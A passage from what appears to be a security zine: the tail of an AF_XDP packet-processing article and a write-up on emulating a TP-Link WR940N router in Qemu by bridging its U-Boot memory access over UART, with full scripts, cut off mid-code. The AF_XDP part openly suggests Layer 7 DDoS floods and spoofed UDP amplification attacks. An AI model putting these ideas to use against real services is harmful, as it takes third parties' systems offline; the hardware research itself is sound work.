--[ 5 - Extending the AF_XDP Framework

---[ 5.0 - High-Speed HTTP/HTTPS Application Fuzzing and L7 DDoS

The architecture developed for this scanner serves as a foundation for
other high-performance network applications, particularly for security
research and testing. The framework can be extended to handle stateful
protocols by implementing a TCP stack in userspace. This involves managing
sequence numbers, ACKs, windowing, and state transitions.

This userspace TCP stack then serves as a transport layer for higher-level
protocols. To interact with HTTPS services, a TLS library (e.g., OpenSSL)
can be integrated by redirecting its I/O from kernel sockets to the
userspace TCP stack. In OpenSSL, this can be done using a custom BIO (Basic
I/O abstraction). The BIO_read and BIO_write callbacks would then interface
with the userspace TCP stack's send/receive buffers, not with read() or
write() syscalls.

With such a setup, you could use AF_XDP to create a high-speed
application-layer fuzzer. For content discovery, one could pipeline a
massive number of fuzzed HTTP requests over multiple, persistent HTTPS
connections, achieving a request-per-second rate far higher than
conventional tools like ffuf or gobuster. This same capability can be used
for Layer 7 DDoS attacks, exhausting a target's resources by flooding it
with the highest RPS you can achieve.

---[ 5.1 - Stateless UDP Fuzzing and DDoS Amplification

UDP protocols are an even simpler target due to their stateless nature.
For these, the packet crafting engine can be adapted to fuzz any UDP
service or execute DDoS reflection/amplification attacks by spoofing the
source IP and generating requests at a massive rate. There's no complex
state to maintain, just packet generation.

This makes AF_XDP programs that interact with UDP protocols
architecturally easier to implement. Several tools already use this
concept, for example to bruteforce DNS records faster (e.g. sanicdns,
pugdns).

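To show how little is involved in the "just packet generation" part, here
is a minimal sketch of building one DNS query and wrapping it in a UDP
header with a valid checksum, which is the kind of payload a DNS bruteforcer
would hand to its TX ring. It is written in Python for readability rather
than in the scanner's own language, the function names are hypothetical,
the addresses come from the documentation range 192.0.2.0/24, and the IP
and Ethernet headers are left out.

```python
import socket
import struct

def build_dns_query(name: str, txid: int) -> bytes:
    """Encode a single-question DNS query (type A, class IN, RD set)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    labels = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    )
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)

def ones_complement_sum(data: bytes) -> int:
    """16-bit one's-complement sum used by the IP/UDP checksums."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total

def pseudo_header(src_ip: str, dst_ip: str, udp_len: int) -> bytes:
    """IPv4 pseudo-header that is covered by the UDP checksum."""
    return (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
            + struct.pack("!BBH", 0, socket.IPPROTO_UDP, udp_len))

def build_udp_segment(src_ip, dst_ip, sport, dport, payload: bytes) -> bytes:
    """Return UDP header + payload with the checksum filled in."""
    length = 8 + len(payload)
    header = struct.pack("!HHHH", sport, dport, length, 0)
    covered = pseudo_header(src_ip, dst_ip, length) + header + payload
    checksum = ~ones_complement_sum(covered) & 0xFFFF
    checksum = checksum or 0xFFFF   # 0 means "no checksum" in UDP over IPv4
    return struct.pack("!HHHH", sport, dport, length, checksum) + payload

if __name__ == "__main__":
    query = build_dns_query("example.com", 0x1234)
    segment = build_udp_segment("192.0.2.1", "192.0.2.53", 40000, 53, query)
    print(segment.hex())
```

Because nothing here depends on a previous packet, every frame can be
pre-built or templated, which is what makes UDP such a natural fit for a
batched TX ring.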
--[ 6 - Caveats and Considerations

This approach has several requirements and trade-offs. Root privileges are
mandatory to load eBPF programs and create AF_XDP sockets, so you won't be
able to use it from an unprivileged session. The implementation complexity
is high, as your application is now responsible for everything from ARP
resolution to MAC address management. Performance is also heavily reliant
on having a modern kernel and a NIC driver that supports native AF_XDP.
Since that is a relatively recent kernel feature, you won't be able to run
it on just any system.

--[ 7 - Conclusion

By combining the filtering capabilities of eBPF at the XDP hook with the
zero-copy architecture of AF_XDP, it is possible to build network
applications that far exceed the performance of traditional socket-based
programs. My port scanner serves as a practical example of this paradigm.
Unlike full bypass frameworks, AF_XDP provides a more universal and less
invasive path to high-performance packet processing by integrating
cooperatively with the mainline Linux kernel. The same principles that
enable my rapid network scanning also provide a foundation for security
research and attack tools.

--[ 8 - References
--[ 9 - Source Code
|=-----------------------------------------------------------------------=|
|=---------------------=[ 6 - MMIO in the Middle ]=----------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ b1ack0wl ]=-----------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of Contents

0 - Introduction
1 - What sparked this research
2 - Looking into Das U-Boot
3 - Initial Testing
4 - Using Qemu to record MMIO transactions
5 - Discoveries
6 - Failed idea(s)
7 - Give this a try yourself!

--[ 0 - Introduction

System on Chips (SoCs) are very common in embedded devices, ranging from
cell phones to cheap smart devices. These chips contain many subcomponents
within them such as flash memory, network chips, modems, ...etc. These
subcomponents are interacted with via Memory Mapped Input Output regions
(MMIO), which is a fancy way of saying "Memory Address 0x00000004 is mapped
to register 'X' for component 'Y'".

The target for this article is the TP-Link WR940N wireless router. This
device has a fairly old processor in it, the "TP9343", which is actually a
Qualcomm Atheros QCA956x SoC. Even though the target device in this article
is outdated, the technique I am about to describe can be applied to
different types of embedded devices where the bootloader can easily be
changed, or has the ability to read and write to physical memory.

--[ 1 - What sparked this research

A while back, @hyprdude and I were doing some reconnaissance on the router.
@hyprdude found that the GPL tarball [1] published by TP-Link was fully
loaded, and included the modified Linux kernel and Das U-Boot sources used
on the device. This discovery sparked the idea of creating a custom Qemu
board for this particular chipset, which would help us understand the
initial MMIO regions that the bootloader reads from and writes to when it's
first powered on (e.g. making an LED blink different colors.)

A custom board will also give us the ability to debug the kernel and kernel modules, because the pins for E-JTAG were not working. After looking at the bootloader's source code, it was obvious why the pins were not working. The following code is executed upon startup, which disables the E-JTAG ports on the device via multiplexing.
[board956x.c]
#define GPIO_FUNC 0x1804006c
/* set non-JTag */
li t0, GPIO_FUNC
lw t1, 0(t0)
li t2, (1<<1) /* we use GPIO14/GPIO15, so disable JTAG */
or t1, t1, t2
sw t1, 0(t0)
By looking at the code, we can note that the MMIO address 0x1804006c is the
`GPIO_FUNC` register. This register may be responsible for GPIO input
multiplexing, but without a datasheet it's all just guesses from prior
experiences. Luckily, there was a datasheet posted on a GitHub repo [2] for
the QCA9563 chip, which specifies that `bit 1` at address `0x1804006c` is
for disabling JTAG.

Since we have source code that actually compiles, we can simply modify Das
U-Boot and enable JTAG. But the goal is to achieve kernel debugging without
touching the hardware, even though it should be possible to access E-JTAG
before the above ASM statements are executed.

--[ 2 - Looking into Das U-Boot

While looking for more hints about the MMIO regions, I decided to analyze
the modified source code for the bootloader within the GPL tarball. If the
following keywords are defined:

- `CONFIG_AUTOBOOT_KEYED`
- `CONFIG_BOOTDELAY`
- `CONFIG_AUTOBOOT_STOP_STR` or `CONFIG_AUTOBOOT_STOP_STR2`

Then the string defined in `CONFIG_AUTOBOOT_STOP_STR*` needs to be sent to
the console before the countdown defined in `CONFIG_BOOTDELAY` reaches
zero. (This reminds me of the game NFL Blitz, where you can press in a code
before the match begins.)

For the WR940Nv6, the string `tpl` is defined and needs to be sent within 1
second after the `CONFIG_AUTOBOOT_PROMPT` is displayed. Doing this manually
has a low success rate, but using python to spam the string `tpl` over and
over again via a serial adapter has a very high success rate! This drops us
into a Das U-Boot shell which gives us read and write access to physical
memory via the `md` and `mw` commands. Awesome!

The code for the `md` and `mw` commands can be found in
`/ap151/boot/u-boot/common/cmd_mem.c` within the GPL tarball for the
WR940Nv6.

--[ 3 - Initial Testing

To make sure that the newly discovered Das U-Boot shell can actually read
and write to physical memory, I decided to write to address `0x18040008`,
which corresponds to the `GPIO_OUT` register. This address is marked as
"read-only" in the datasheet, so I looked at the Das U-Boot code to find
any hints to help me confirm whether this is true. Within the `led.S` file
the address `0x18040008` is labeled as `GPIO_OUT`, which lines up with the
datasheet, but then they write the value `0xc000` to it with a comment that
says that the LED will turn orange.

The value `0xc000` has bits 14 and 15 set, which could mean that GPIO
output ports 14 and 15 are "ON", which turns on the LED, but why is it
orange? Well, the LED is a three pin multi-colored LED with two different
colors, red (but it looks orange irl) and blue. By providing power to one
of the pins, we can enable the red (orange) LED. Since this code is made to
support different versions of the WR940N (which all have different LED
configurations) they set both GPIO 14 and 15 to ON, but only one pin is
needed to make the red LED turn on, so the red pin is connected to either
GPIO pin 14 or 15. Through trial and error it was found that GPIO pin 14 on
the WR940Nv6 is the red LED.

There's a statement within `led.S` that says to turn all of the "WAN" LEDs
blue via `~((1<<3) | (1<<14) | (1<<4) | (1<<5) | (1<<6) | (1<<7))`, and
through more trial and error it was discovered that GPIO pin 19 turns on
the blue LED, and that setting pins 14 and 19 together makes the LED turn
purple!

Even though this test seems a bit silly, it verifies that the Das U-Boot
shell can write to MMIO regions and that the writes actually take effect!

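The bit arithmetic behind those `GPIO_OUT` values is easy to get wrong by
one position, so here is a small Python sketch for checking it. The helper
names `bits_set` and `pins_to_mask` are made up for this example, and it
only models the numbers: whether a set bit means "LED on" for a given pin
is something the hardware decides, not this code.

```python
def bits_set(value: int, width: int = 32) -> list:
    """Return the indices of all set bits in a register value."""
    return [bit for bit in range(width) if (value >> bit) & 1]

def pins_to_mask(*pins: int) -> int:
    """Build a register value with one bit set per GPIO pin number."""
    mask = 0
    for pin in pins:
        mask |= 1 << pin
    return mask

if __name__ == "__main__":
    # 0xc000 is the value led.S writes for the "orange" LED
    print("0xc000 sets pins", bits_set(0xC000))
    # Pin numbers found through trial and error in the text
    print(f"pin 14 (red):     0x{pins_to_mask(14):08x}")
    print(f"pin 19 (blue):    0x{pins_to_mask(19):08x}")
    print(f"pins 14+19:       0x{pins_to_mask(14, 19):08x}")
    # The inverted "WAN LEDs" mask from led.S, truncated to 32 bits
    wan = ~pins_to_mask(3, 14, 4, 5, 6, 7) & 0xFFFFFFFF
    print(f"led.S WAN mask:   0x{wan:08x}")
```

The same helpers are handy later when reading the recorded MMIO log, since
most GPIO writes only make sense once they are broken down into pins.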
The following diagram shows how the test was conducted:

          ||====[UART (Das U-Boot Shell)]
          ||                                    \ | /
          vv
    +------------+                           /---------\
    |            |---------GPIO 14---------->|         |
    |            |                            \  LED  /
    |  QCA956x   |                              | | |
    |            |---------GPIO 19--------------->| |
    |            |-----------GND------------------->|
    +------------+                              | | |

After this test, I created a python script that connects to a UART serial
adapter via the `serial` module and accepts commands to read or write 4
bytes of data to memory via a TCP socket. Using this approach is expected
to be slow, but if this works then I can integrate all of it in C via
libftdi or libusb and eliminate the need of using a socket and python. Make
it work first, then make it fast later.

Code:

NOTE: The code below is only part of the final MITM python script.

def read_from_phy_memory(ser, address):
    print(f'[*] Reading from Address: 0x{address:08X}...')
    ser.write(bytes(f"md 0x{address:08X} 1\n","UTF-8"))
    out = get_response(ser)
    # U-Boot prints "<address>: <value>"; grab the 8 hex digits after it
    prefix = bytes(f'{address:08x}: ',"UTF-8")
    offset = out.rfind(prefix)
    value = int(out[offset + len(prefix):offset + len(prefix) + 8], 16)
    logging.debug(f"READ: 0x{address:08X}: 0x{value:08X}")
    return value

def write_to_phy_memory(ser, address, value):
    print(f'[*] Writing to Address: 0x{address:08X} with value '
          f'0x{value:08X}...')
    logging.debug(f"WRITE: 0x{address:08X}: 0x{value:08X}")
    ser.write(bytes(f"mw 0x{address:04X} 0x{value:04X}\n","UTF-8"))

def listen_and_respond(ser, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        s.bind(("0.0.0.0", port))
    except OSError as err:
        # OSError is not subscriptable in Python 3, use its attributes
        print(f'[-] Bind failed. Error Code : {err.errno}'
              f' Message {err.strerror}')
        return False
    s.listen(1)
    print (f'[*] Socket now listening on port {port}')
    while True:
        conn, addr = s.accept()
        msg = conn.recv(1024)
        while len(msg) > 0:
            if msg == b'exit\n':
                conn.send(bytes('[*] Byeeeeee\n', "UTF-8"))
                conn.close()
                break
            if msg == b'shutdown\n':
                conn.send(bytes('[*] The server is going down down\n',
                                "UTF-8"))
                conn.close()
                s.shutdown(socket.SHUT_WR)
                s.close()
                return
            elif msg[0] == ord('r'):
                # Read Bytes
                addr = int(msg[1:].strip(b'\n'), 16)
                out = read_from_phy_memory(ser, addr)
                conn.send(bytes(hex(out), "UTF-8"))
            elif msg[0] == ord('w'):
                # Write Bytes
                address = msg[1:].split(b" ")[0]
                value = msg[1:].split(b" ")[1].strip(b'\n')
                write_to_phy_memory(ser, int(address, 16), int(value, 16))
                conn.send(b'1')
            msg = conn.recv(1024)

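The fragile part of the read path is pulling the value out of whatever the
console printed. As an alternative to the offset arithmetic above, here is a
hedged sketch that does the same job with a regular expression and returns
`None` when nothing matches. The function name `parse_md_word` is made up,
and the sample console text assumes the usual U-Boot `md` layout of
"address: value" followed by an ASCII column; the exact output on the
WR940Nv6 may differ.

```python
import re
from typing import Optional

def parse_md_word(console_output: bytes, address: int) -> Optional[int]:
    """Extract the 32-bit word printed by `md <address> 1`.

    Looks for "<8 hex digit address>: <8 hex digit value>" and returns the
    value from the last match, or None if the address never shows up.
    """
    pattern = re.compile(rb"%08x:\s*([0-9a-f]{8})" % address, re.IGNORECASE)
    matches = pattern.findall(console_output)
    if not matches:
        return None
    return int(matches[-1], 16)

if __name__ == "__main__":
    # Assumed sample: echoed command, one md line, then the prompt
    sample = b"md 0x18040008 1\r\n18040008: 0000c000    ....\r\nap151> "
    value = parse_md_word(sample, 0x18040008)
    print("no match" if value is None else f"0x{value:08x}")
```

Returning `None` instead of raising lets the caller decide whether to retry
the `md` command, which matters on a serial link where output can arrive
late or truncated.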
--[ 4 - Using Qemu to record MMIO transactions

To help speed up development, I copied the `mipssim.c` board within the
`qemu/hw/mips` directory and used it as a skeleton. From there I reviewed
the documentation for Qemu to learn the memory APIs. All that is needed to
make an MMIO region is to first call `memory_region_init_io()` with the
MemoryRegion pointer (which comes from g_new(MemoryRegion, 1)), a struct
with the `.read` and `.write` callbacks populated (struct MemoryRegionOps),
the name of the region for Qemu to use (e.g. "DDR"), and then the size of
the region. The second argument can take an owner Object, and the fourth
takes an opaque pointer that is passed to the callbacks. Neither is needed
at this stage, but the opaque pointer will be needed when implementing the
logic for the virtual component. Lastly, `memory_region_add_subregion()`
needs to be called for the subregion to be applied to the main memory space
(the return value of get_system_memory()).

The following Qemu snippet demonstrates registering the subregion for the
GPIO registers:

[...]
/* MMIO Callbacks for GPIO */
// READ
static uint64_t gpio_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    return 0; // return 0 for all reads in the GPIO region
}

// WRITE
static void gpio_mmio_write(void *opaque, hwaddr addr,
                            uint64_t val, unsigned size)
{
    // The addr argument is an offset within the MMIO region
    // 0x44 == 0x18040044
    if (addr == 0x44) { // Skip this register since this breaks MITM MMIO
        return;
    }
    return;
}

// Struct for Callbacks + Endianness
static const MemoryRegionOps gpio_mmio_ops = {
    .read = gpio_mmio_read,
    .write = gpio_mmio_write,
    .endianness = DEVICE_BIG_ENDIAN
};

// Get physical memory
MemoryRegion *address_space_mem = get_system_memory();
// Init GPIO region
memory_region_init_io(gpio_mmio, NULL, &gpio_mmio_ops, NULL, "GPIO_MMIO",
                      0x70);
// Add subregion to physical memory
memory_region_add_subregion(address_space_mem, 0x18040000LL, gpio_mmio);
// Reads and writes to GPIO will trigger the callbacks during runtime.
[...]

With the regions mapped with callbacks, the next step is to connect Qemu to
the MITM script. This can be accomplished while the virtual board is being
initialized by creating a socket, saving the socket fd, connecting to the
python listener, and returning. Then, within the callbacks, the socket fd
is used to request reads and writes to physical memory from the python
listener.

This is how it's all connected:

    +----------+       +----------+        +----------+
    |   Qemu   |<-TCP->|  Python  |<-UART->|  Router  |
    |          |       |          |        |  U-Boot  |
    +----------+       +----------+        +----------+

Note: If a datasheet could not have been found for this SoC, I would have
registered one large MMIO callback region starting at an address that
crashes when running from a found entry point. (e.g. Address: 0x18000000
Size: 0x18000000 [0x18000000-0x30000000])

--[ 5 - Discoveries

The initial discovery that was already mentioned is that the datasheet and
source code don't line up 100%, it's more like 90%. Besides that, it was
found that the DDR region (0x18000000) is reported as 0x128 bytes in size,
but there's an additional register (DDR3_CONFIG) that lives at
`0x1800015C`, so there are either undocumented registers between
`0x128-0x15c` or that particular memory space is unused. Another discovery
was a region that wasn't fully documented within the datasheet. I've
labeled it `GMAC1`; it lives at `0x1A000000` with size `0x2E8`, and the
values written to it are very close to the values written to the `GMAC0`
region (0x19000000).

The virtual device actually gets pretty far within the boot process, but
fails during the initialization of the WiFi driver. Since we're just
capturing MMIO transactions, the thing that's missing are the interrupts
that need to be raised when certain conditions happen for each
subcomponent. (e.g. Raise an interrupt for when a certain register for a
clock reaches zero during calibration.)

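One way to sift a recorded log for findings like these is to tag every
transaction with the region it falls into and flag the addresses that land
outside any known region. The sketch below is only an illustration: the
`REGIONS` table uses the bases and sizes that appear in this article (the
GPIO and DDR sizes are the ones registered in the board code further down),
the log line format is assumed to match what the MITM script writes to
`bootup.log`, and the names `Region`, `classify` and `annotate` are
hypothetical.

```python
import re
from typing import NamedTuple, Optional, Tuple

class Region(NamedTuple):
    name: str
    base: int
    size: int

# Bases and sizes as they appear in the article and its board code
REGIONS = [
    Region("DDR", 0x18000000, 0x160),
    Region("GPIO", 0x18040000, 0x74),
    Region("GMAC1", 0x1A000000, 0x2E8),
]

# Matches e.g. 'WRITE: 0x18040008: 0x00080000' anywhere in a log line
LOG_RE = re.compile(r"(READ|WRITE): 0x([0-9A-Fa-f]{8}): ?0x([0-9A-Fa-f]{8})")

def classify(address: int) -> Optional[Tuple[str, int]]:
    """Return (region name, offset) for an address, or None if unmapped."""
    for region in REGIONS:
        if region.base <= address < region.base + region.size:
            return region.name, address - region.base
    return None

def annotate(line: str):
    """Turn one log line into (op, region, offset, value), or None."""
    match = LOG_RE.search(line)
    if match is None:
        return None
    op, address, value = match.group(1), int(match.group(2), 16), \
        int(match.group(3), 16)
    hit = classify(address)
    if hit is None:
        return op, "UNKNOWN", address, value
    return op, hit[0], hit[1], value

if __name__ == "__main__":
    print(annotate('"12:00:01;WRITE: 0x18040008: 0x00080000'))
    print(annotate('"12:00:02;READ: 0x1800015C: 0x00000000'))
```

Anything that comes back as "UNKNOWN" is a candidate for an undocumented
register or a region that still needs its own callbacks.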
The GPIO address `0x18040044` is labeled `UART0_SIN Multiplexing` and is
used to set which GPIO pins are used for UART0. During the boot process
this register is written to, which breaks the UART connection that is used
to interact with Das U-Boot. Adding a statement to skip offset `0x44` for
this region is needed to continue booting from Das U-Boot and into Linux
(virtually).

This approach allows us to utilize a component of the SoC in real life
while being able to emulate all of the other subcomponents that we're not
interested in. (e.g. utilize the device's Ethernet Ports + Controller, but
emulate the rest of the other subcomponents)

--[ 6 - Failed ideas

My first idea was to use `/dev/mem` to read and write to physical memory,
but attempting to write to physical memory would result in a segfault.
Reading from these regions was fine, but writing was a no-go. Plus, the OS
is fully loaded with running drivers, so these regions are constantly being
used. Attempting to read and write could cause unpredictable system
instability, so leveraging the bootloader seemed like a better idea. No
drivers, No OS, just GPIO pins :)

I then attempted to bit bang GPIO pins for E-JTAG with an Arduino nano, but
this resulted in nothing being found :(

--[ 7 - Give this a try yourself!

* Turn off the WR940Nv6
* Connect a serial adapter to the UART pins
    * Note: There are two jumpers that need to be soldered to complete
      the circuit for RX/TX
* Run the script below to drop the WR940Nv6 into the Das U-Boot shell
* Turn on the Router via the button on the back of the router
    * Note: If the script doesn't detect a shell within a few seconds
      then reboot the router and it should work
* Connect to TCP port 1337 once the script detects a Das U-Boot shell
* Send the string `w0x18040008 0x00080000` to turn the front LED blue
* Send the string `w0x18040008 0x00004000` to turn off the front LED
* Send `shutdown` to close the server socket and exit
* MMIO MITM Python Code:

import serial
import time
import socket
import logging

### CONSTS ###
GPIO_OUT = 0x18040008

logger = logging.getLogger(__name__)
logging.basicConfig(filename='bootup.log',
                    format='"%(asctime)s;%(message)s',
                    datefmt="%H:%M:%S", filemode='w',
                    encoding='utf-8', level=logging.DEBUG)

def get_response(ser):
    # Give U-Boot a moment to answer, then drain the serial buffer
    time.sleep(0.02)
    out = b""
    while ser.inWaiting() > 0:
        out += ser.read(1)
    return out

def read_from_phy_memory(ser, address):
    print(f'[*] Reading from Address: 0x{address:08X}...')
    ser.write(bytes(f"md 0x{address:08X} 1\n","UTF-8"))
    out = get_response(ser)
    # U-Boot prints "<address>: <value>"; grab the 8 hex digits after it
    prefix = bytes(f'{address:08x}: ',"UTF-8")
    offset = out.rfind(prefix)
    value = int(out[offset + len(prefix):offset + len(prefix) + 8], 16)
    logging.debug(f"READ: 0x{address:08X}: 0x{value:08X}")
    return value

def write_to_phy_memory(ser, address, value):
    print(f'[*] Writing to Address: 0x{address:08X} with value '
          f'0x{value:08X}...')
    logging.debug(f"WRITE: 0x{address:08X}: 0x{value:08X}")
    ser.write(bytes(f"mw 0x{address:04X} 0x{value:04X}\n","UTF-8"))
    time.sleep(0.01)

def test_uboot_cmd_line(ser, test_string):
    # An "Unknown command" reply means we are already at the U-Boot prompt
    ser.write(bytes(f"{test_string}\n","UTF-8"))
    out = get_response(ser)
    if bytes(f'Unknown command \'{test_string}\'', "UTF-8") in out:
        return True

def spam_tpl_for_uboot(ser, max_attempts):
    while True:
        ser.write(b'tpl')
        out = get_response(ser)
        if b"ap151>" in out:
            print(f"[+] Router is now in [REDACTED] state with "
                  f"{max_attempts} attempts remaining.")
            return True
        max_attempts -= 1
        if max_attempts == 0:
            print("[-] Unable to get the router into the [REDACTED] state. "
                  "Try Rebooting...")
            return False

def listen_and_respond(ser, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        s.bind(("0.0.0.0", port))
    except OSError as err:
        # OSError is not subscriptable in Python 3, use its attributes
        print(f'[-] Bind failed. Error Code : {err.errno}'
              f' Message {err.strerror}')
        return False
    s.listen(1)
    print (f'[*] Socket now listening on port {port}')
    while True:
        conn, addr = s.accept()
        msg = conn.recv(1024)
        while len(msg) > 0:
            if msg == b'exit\n':
                conn.send(bytes('[*] Byeeeeee\n', "UTF-8"))
                conn.close()
                break
            if msg == b'shutdown\n':
                conn.send(bytes('[*] The server is going down down\n',
                                "UTF-8"))
                conn.close()
                s.shutdown(socket.SHUT_WR)
                s.close()
                return
            elif msg[0] == ord('r'):
                # Read Bytes
                addr = int(msg[1:].strip(b'\n'), 16)
                out = read_from_phy_memory(ser, addr)
                conn.send(bytes(hex(out), "UTF-8"))
            elif msg[0] == ord('w'):
                # Write Bytes
                address = msg[1:].split(b" ")[0]
                value = msg[1:].split(b" ")[1].strip(b'\n')
                write_to_phy_memory(ser, int(address, 16), int(value, 16))
                conn.send(b'1')
            msg = conn.recv(1024)

def splash():
    print('[~ * ~ [WR940N MMIO MITM] ~ * ~]')
    print('[>>>>>>>>>>> by: b1ack0wl <<<<<<<<<<<]')

def main():
    ser = serial.Serial(
        port='/dev/ttyUSB1', # Note: Change this for your USB serial device
        baudrate=115200
    )
    already_open = test_uboot_cmd_line(ser, "0wl")
    ser.isOpen()
    if (already_open != True):
        print(f'[*] Attempting to get the WR940N into the Das U-Boot shell...')
        if (spam_tpl_for_uboot(ser, 5000) == False):
            ser.close()
            return
    else:
        print(f"[*] Router is already in the Das U-boot shell :D")
    ser.write(b'\n\n')
    listen_and_respond(ser, 1337)

if __name__ == '__main__':
    splash()
    main()
    print('[*] - Done')

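For poking at the listener without Qemu in the loop, a few lines of Python
are enough to speak the same `r`/`w` text protocol. This is a minimal
sketch rather than part of the original tooling: the helper names are made
up, and it assumes the listener above is running on 127.0.0.1:1337 and
answers reads with a hex string and writes with `1`.

```python
import socket

def read_cmd(address: int) -> bytes:
    """Wire format for a 4-byte read, e.g. b'r0x18040008\\n'."""
    return f"r0x{address:08x}\n".encode()

def write_cmd(address: int, value: int) -> bytes:
    """Wire format for a 4-byte write, e.g. b'w0x18040008 0x00080000\\n'."""
    return f"w0x{address:08x} 0x{value:08x}\n".encode()

def mmio_read(sock: socket.socket, address: int) -> int:
    """Ask the listener to run `md` and return the word it reports."""
    sock.sendall(read_cmd(address))
    return int(sock.recv(64), 16)

def mmio_write(sock: socket.socket, address: int, value: int) -> bool:
    """Ask the listener to run `mw`; True if it acknowledged with b'1'."""
    sock.sendall(write_cmd(address, value))
    return sock.recv(64) == b"1"

# Example session (needs the MITM script and the router attached):
#
#   with socket.create_connection(("127.0.0.1", 1337)) as sock:
#       mmio_write(sock, 0x18040008, 0x00080000)   # front LED blue
#       print(hex(mmio_read(sock, 0x18040008)))
#       sock.sendall(b"exit\n")
```

Each request waits for its reply before the next one is sent, which mirrors
what the Qemu callbacks do and avoids two commands being merged into a
single `recv()` on the listener side.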
This is the Qemu board code.

* It needs to be put in the `qemu/hw/mips` folder.
* NOTE: Only GPIO, SPI, and DDR are mapped, it is up to the reader to
  complete the rest

/*
* System emulation for the WR940N V6 board, but stripped for Phrack
* by b1ack0wl <3
*/
#include "qemu/osdep.h"
#include "qapi/error.h"
#include "qemu/datadir.h"
#include "exec/address-spaces.h"
#include "hw/clock.h"
#include "hw/mips/mips.h"
#include "net/net.h"
#include "sysemu/sysemu.h"
#include "hw/boards.h"
#include "hw/loader.h"
#include "elf.h"
#include "hw/sysbus.h"
#include "hw/qdev-properties.h"
#include "qemu/error-report.h"
#include "sysemu/qtest.h"
#include "sysemu/reset.h"
#include "sysemu/runstate.h"
#include "cpu.h"
#include "hw/mips/wr940n.h"
int client_fd = 0; // global lol
#define BIOS_FILENAME "u-boot.bin"
static struct _loaderparams {
    int ram_size;
    const char *kernel_filename;
    const char *kernel_cmdline;
    const char *initrd_filename;
} loaderparams;

typedef struct ResetData {
    MIPSCPU *cpu;
    uint64_t vector;
} ResetData;

static uint64_t load_kernel(void)
{
    uint64_t entry, kernel_high, initrd_size;
    long kernel_size;
    ram_addr_t initrd_offset;

    kernel_size = load_elf(loaderparams.kernel_filename, NULL,
                           cpu_mips_kseg0_to_phys, NULL,
                           &entry, NULL,
                           &kernel_high, NULL, TARGET_BIG_ENDIAN,
                           EM_MIPS, 1, 0);
    if (kernel_size < 0) {
        error_report("could not load kernel '%s': %s",
                     loaderparams.kernel_filename,
                     load_elf_strerror(kernel_size));
        exit(1);
    }

    /* load initrd */
    initrd_size = 0;
    initrd_offset = 0;
    if (loaderparams.initrd_filename) {
        initrd_size = get_image_size(loaderparams.initrd_filename);
        if (initrd_size > 0) {
            initrd_offset = ROUND_UP(kernel_high, INITRD_PAGE_SIZE);
            if (initrd_offset + initrd_size > loaderparams.ram_size) {
                error_report(
                    "memory too small for initial ram disk '%s'",
                    loaderparams.initrd_filename);
                exit(1);
            }
            initrd_size = load_image_targphys(
                loaderparams.initrd_filename,
                initrd_offset, loaderparams.ram_size - initrd_offset);
        }
        if (initrd_size == (target_ulong) -1) {
            error_report("could not load initial ram disk '%s'",
                         loaderparams.initrd_filename);
            exit(1);
        }
    }
    return entry;
}

static void main_cpu_reset(void *opaque)
{
    ResetData *s = (ResetData *)opaque;
    CPUMIPSState *env = &s->cpu->env;

    cpu_reset(CPU(s->cpu));
    env->active_tc.PC = s->vector;
}

static void connect_to_mmio_server(void)
{
    int status;
    struct sockaddr_in serv_addr;

    if ((client_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("\n Socket creation error \n");
        return;
    }

    /* Zero the struct so no stack garbage ends up in unused fields */
    memset(&serv_addr, 0, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(1337);
    if (inet_pton(AF_INET, "127.0.0.1", &serv_addr.sin_addr) <= 0) {
        puts("\n[*] bruh...");
        return;
    }

    if ((status = connect(client_fd, (struct sockaddr *)&serv_addr,
                          sizeof(serv_addr))) < 0) {
        puts("\n[-] Connection to the MMIO MITM interface failed...");
        puts("[*] Is the MMIO MITM script even running?!?!");
        exit(-1); // We need the interface to be up
        return;
    }
}

static int read_mmio_mitm(int address)
{
    int valread, ret_val = 0;
    char buffer[128] = { 0 };

    snprintf(buffer, sizeof(buffer), "r0x%x", address);
    send(client_fd, buffer, strlen(buffer), 0);
    memset(buffer, 0, sizeof(buffer));
    valread = read(client_fd, buffer, sizeof(buffer) - 1);
    if (valread > 0) { // read() returns -1 on error, 0 on EOF
        ret_val = strtol(buffer, NULL, 16);
    }
    return ret_val;
}

static int write_mmio_mitm(int address, int value)
{
    int valread, ret_val = 0;
    char buffer[128] = { 0 };

    snprintf(buffer, sizeof(buffer), "w0x%x 0x%x", address, value);
    send(client_fd, buffer, strlen(buffer), 0);
    memset(buffer, 0, sizeof(buffer));
    valread = read(client_fd, buffer, sizeof(buffer) - 1);
    if (valread > 0) { // read() returns -1 on error, 0 on EOF
        ret_val = atoi(buffer);
    }
    return ret_val;
}

// MMIO Callbacks for GPIO
static uint64_t gpio_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    int base_addr = 0x18040000;
    int ret_val = 0;

    ret_val = read_mmio_mitm(base_addr + addr);
    return ret_val;
}

static void gpio_mmio_write(void *opaque, hwaddr addr,
                            uint64_t val, unsigned size)
{
    int base_addr = 0x18040000;

    if (addr == 0x44) { // This is for UART Multiplexing, skip.
        return;
    }
    write_mmio_mitm(base_addr + addr, val);
    return;
}

static const MemoryRegionOps gpio_mmio_ops = {
    .read = gpio_mmio_read,
    .write = gpio_mmio_write,
    .endianness = DEVICE_BIG_ENDIAN
};

// MMIO Callbacks for SPI
static uint64_t spi_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    struct SPI_IO *spi_io = opaque;

    switch (addr) {
    case 0x0:
        return 1;
    case 0x8:
        break;
    case 0xC: // (SPI_READ_DATA_ADDR)
